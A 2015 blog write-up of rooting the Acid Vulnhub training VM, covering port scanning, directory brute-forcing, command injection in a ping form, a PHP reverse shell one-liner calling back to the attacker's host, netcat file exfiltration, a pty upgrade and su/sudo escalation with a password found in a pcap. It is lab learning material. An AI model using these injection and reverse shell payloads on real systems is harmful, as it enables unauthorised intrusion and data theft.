Vulnhub - Acid
Posted on 11 Sep 2015 in security • 6 min read
Since Fart knocker in June I have worked on an other vulnhub machine: darknet. But this one is really hard and get me stuck. I was a bit demotivated to continue vulnhub's machines but I got some time this week, therefore I tried the Acid one.
The goal is as usual, get root on the virtual machine. Let's go:
Host Discovery
As always, we start with host discovery: Nmap and nikto are our friends for this step.
nmap
We launch nmap against the virtual machine:
$ nmap 192.168.0.18 -p0-65535 -A -oA nmap
Starting Nmap 6.47 ( http://nmap.org ) at 2015-09-08 12:08 CEST
Stats: 0:07:31 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 98.89% done; ETC: 12:15 (0:00:05 remaining)
Nmap scan report for 192.168.0.18
Host is up (0.0045s latency).
Not shown: 65535 closed ports
PORT STATE SERVICE
33447/tcp open unknown
|_http-title: /Challenge
Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
We got a nice Apache web server with a simple splash screen. Notice the page title: /Challenge.
Nikto
I ran nikto on the target but nothing pop out.
Web exploitation
Page source
As we come pretty empty handed, we check the page source and two interesting things came out:
- Some hexadecimal code at the end of the page: 0x643239334c6d70775a773d3d
- the title of the page (we can see it in the nmap scan) is /Challenge and there is an other web page at this address.
Hexa code
We will start with the first lead the hexadecimal code:
0x643239334c6d70775a773d3d
We convert it to string and we got:
?d293LmpwZw==
We decode the base64 and we got:
wow.jpg
We go to the url (the /images/ is given with the background image of the first web page):
http://192.168.0.18:33447/images/wow.jpg
As a result we got a nice image that reward us for our success.
Yeah it seems to be some troll :)
/Challenge
Let us dig the second lead: the page title. By adding /Challenge
in the URL,
we land on an authentication interface.
I tried to use SQL injection but nothing. We will try dirbuster with the small dictionary (`/usr/share/dirbuster/directory-list-2.3-small.txt):
DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Tue Sep 08 16:54:05 CEST 2015
--------------------------------
http://192.168.0.18:33447
--------------------------------
Directories found during testing:
Dirs found with a 200 response:
/Challenge/
Dirs found with a 403 response:
/Challenge/css/
/Challenge/includes/
/Challenge/js/
/Challenge/styles/
/Challenge/less/
--------------------------------
Files found during testing:
Files found with a 200 responce:
/Challenge/index.php
/Challenge/error.php
/Challenge/includes/functions.php
/Challenge/cake.php
Files found with a 302 responce:
/Challenge/include.php
/Challenge/includes/logout.php
/Challenge/hacked.php
--------------------------------
We got the cake.php
page but as we all know "The cake is a lie". We noticed
that the page title is one more time a folder: /Magic_box
.
When going to /Challenge/Magic_box
we got a 403 forbidden page. Let us fire
dirbuster
again:
DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Tue Sep 08 17:17:43 CEST 2015
--------------------------------
http://192.168.0.18:33447
--------------------------------
Directories found during testing:
Dirs found with a 403 response:
/Challenge/Magic_Box/
/Challenge/Magic_Box/proc/
--------------------------------
Files found during testing:
Files found with a 200 responce:
/Challenge/Magic_Box/low.php
/Challenge/Magic_Box/command.php
Files found with a 302 responce:
/Challenge/Magic_Box/proc/validate.php
--------------------------------
We got some nice result mostly the /command.php
page.
Command execution
The page let us ping an other machine in the network. Nevertheless the page name
let us think that we can use command exploitation. If we add a ;
in the filed
and a command it seems to works, for instance with ; ls
we got (I use
burp for all my pentest, the output of the
command is in the response page):
command.php
command.php.save
command2.php.save
command2.php.save.1
low.php
proc
tails.php
We can also read /etc/passwd
: there is two users on the server: acid and
saman.
Let us try to get a reverse shell with that.
reverse shell
As always, a good source of information is pentest monkey.
We know the site use php so we will try the php reverse shell first:
- On the host we execute:
nc -l -p 6666
- On the target (via the ping interface) we query:
; php -r '$sock=fsockopen("192.168.0.13",6666);exec("/bin/sh -i <&3 >&3 2>&3");'
It got us a shell on the machine (without tty/pty). But executing the request in the ping interface each time we want the shell in painful, so I extract the curl command from burp:
curl -i -s -k -X 'POST' \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0' -H 'DNT: 1' -H 'Referer: http://192.168.0.18:33447/Challenge/Magic_Box/command.php' -H 'Content-Type: application/x-www-form-urlencoded' \
-b 'sec_session_id=2cdjrm9k6khpfiilsad1kmnpj2' \
--data-binary $'IP=%3B+php+-r+%27%24sock%3Dfsockopen%28%22192.168.0.13%22%2C6666%29%3Bexec%28%22%2Fbin%2Fsh+-i+%3C%263+%3E%263+2%3E%263%22%29%3B%27&submit=submit' \
'http://192.168.0.18:33447/Challenge/Magic_Box/command.php'
Now that we have a shell, let us see what we can do.
Shell exploitation
First we discover what is at our disposal, mostly in the /home/
(bash_history
). In the /home/acid/
there is something interesting but
empty:
ls -la /home/acid/.su*
-rw-r--r-- 1 acid acid 0 Jul 31 17:27 /home/acid/.sudo_as_admin_successful
Let us see what else we got on the machine:
$ ls /
bin
boot
cdrom
dev
etc
home
initrd.img
lib
lost+found
media
mnt
opt
proc
root
run
s.bin
sbin
srv
sys
tmp
usr
var
vmlinuz
$ ls /opt/
$ ls /media
acid
floppy
floppy0
$ ls /s.bin
investigate.php
$ cat /s.bin/investigate.php
<?php
echo "Now you have to behave like an investigator to catch the culprit\n";
?
That is interesting the php file in /s.bin/
clearly tell us to investigate.
But what we need know is a privilege escalation ti gain root access.
Privilege escalation
I tried the overlayfs exploit (the same as with Fart knocker) without success:
- I compiled the exploit on an other 32 bits virtual machine;
- I transfered it to the shell via netcat;
-
And it failed:
$ ./ofs.bin : 4: spawning threads mount #1 mount #2 child threads done exploit failed
But we were given an hint.
More investigations
The pwnwiki.io wiki is always a
good source of information. So with more investigation we look at bash_history,
search for *txt*
files, an so on. Then *pcap*
files:
$ find / -name *pcap* 2>/dev/null
/lib/modules/3.19.0-15-generic/kernel/drivers/rtc/rtc-pcap.ko
/lib/modules/3.19.0-15-generic/kernel/drivers/input/misc/pcap_keys.ko
/lib/modules/3.19.0-15-generic/kernel/drivers/input/touchscreen/pcap_ts.ko
/lib/modules/3.19.0-15-generic/kernel/drivers/regulator/pcap-regulator.ko
/sbin/raw_vs_isi/hint.pcapng
/sbin/getpcaps
/sys/bus/spi/drivers/ezx-pcap
/usr/share/doc/libpcap0.8
/usr/share/mime/application/vnd.tcpdump.pcap.xml
/usr/share/man/man7/pcap-filter.7.gz
/usr/share/man/man1/getpcaps.1.gz
/usr/lib/i386-linux-gnu/libpcap.so.1.6.2
/usr/lib/i386-linux-gnu/libpcap.so.0.8
/usr/src/linux-headers-3.19.0-15/include/linux/mfd/ezx-pcap.h
/usr/src/linux-headers-3.19.0-15-generic/include/config/ezx/pcap.h
/usr/src/linux-headers-3.19.0-15-generic/include/config/touchscreen/pcap.h
/usr/src/linux-headers-3.19.0-15-generic/include/config/rtc/drv/pcap.h
/usr/src/linux-headers-3.19.0-15-generic/include/config/input/pcap.h
/usr/src/linux-headers-3.19.0-15-generic/include/config/regulator/pcap.h
/var/lib/dpkg/info/libpcap0.8:i386.postinst
/var/lib/dpkg/info/libpcap0.8:i386.shlibs
/var/lib/dpkg/info/libpcap0.8:i386.postrm
/var/lib/dpkg/info/libpcap0.8:i386.md5sums
/var/lib/dpkg/info/libpcap0.8:i386.symbols
/var/lib/dpkg/info/libpcap0.8:i386.list
Yes /sbin/raw_vs_isi/hint.pcapng
!
pcap
We transfer the file with netcat:
- On our attack machine:
nc -lp 1234 > pcap
- On the server:
nc 192.168.0.13 1234 < /sbin/raw_vs_isi/hint.pcapng
We open the pcap file with wireshark. There is a lot of information in this file, over 6 000 trams. On the 6 212 we notice some sort of text. By following the TCP stream (wireshark function) we discover what seems to be a chat exchange:
heya
hello What was the name of the Culprit ???
saman and now a days he's known by the alias of 1337hax0r
oh...Fuck....Great...Now, we gonna Catch Him Soon :D
Yes .. We have to !! The mad bomber is on a rage
Ohk...cya
Over and Out
Great, what does it means? We know that saman is one of the user on the machine. Maybe we got some hints about it password or something like that.
interactive shell
In order to execute a su, we need a interactive shell (with pty/tty). Once more pentest monkey will help us:
python -c 'import pty; pty.spawn("/bin/sh")'
As /bin/sh
is a symlink to dash, we directly use bash:
python -c 'import pty; pty.spawn("/bin/bash")'
We now need to try to connect as saman.
Saman
With our beautiful shell we jut have to su saman
to try to connect as saman:
www-data@acid:/var/www/html/Challenge/Magic_Box$ su saman
su saman
Password: 1337hax0r
It works! Let us try sudo su
:
saman@acid:/var/www/html/Challenge/Magic_Box$ sudo su
sudo su
[sudo] password for saman: 1337hax0r
root@acid:/var/www/html/Challenge/Magic_Box# cat /root/flag.txt
cat /root/flag.txt
Dear Hax0r,
You have successfully completed the challenge.
I hope you like it.
FLAG NAME: "Acid@Makke@Hax0r
Conclusion
It was a nice box to root but as I read the other write up it seems that my way was not the one expected. Nevertheless, thank to Avinash Kumar Thapa for the box and vulnhub.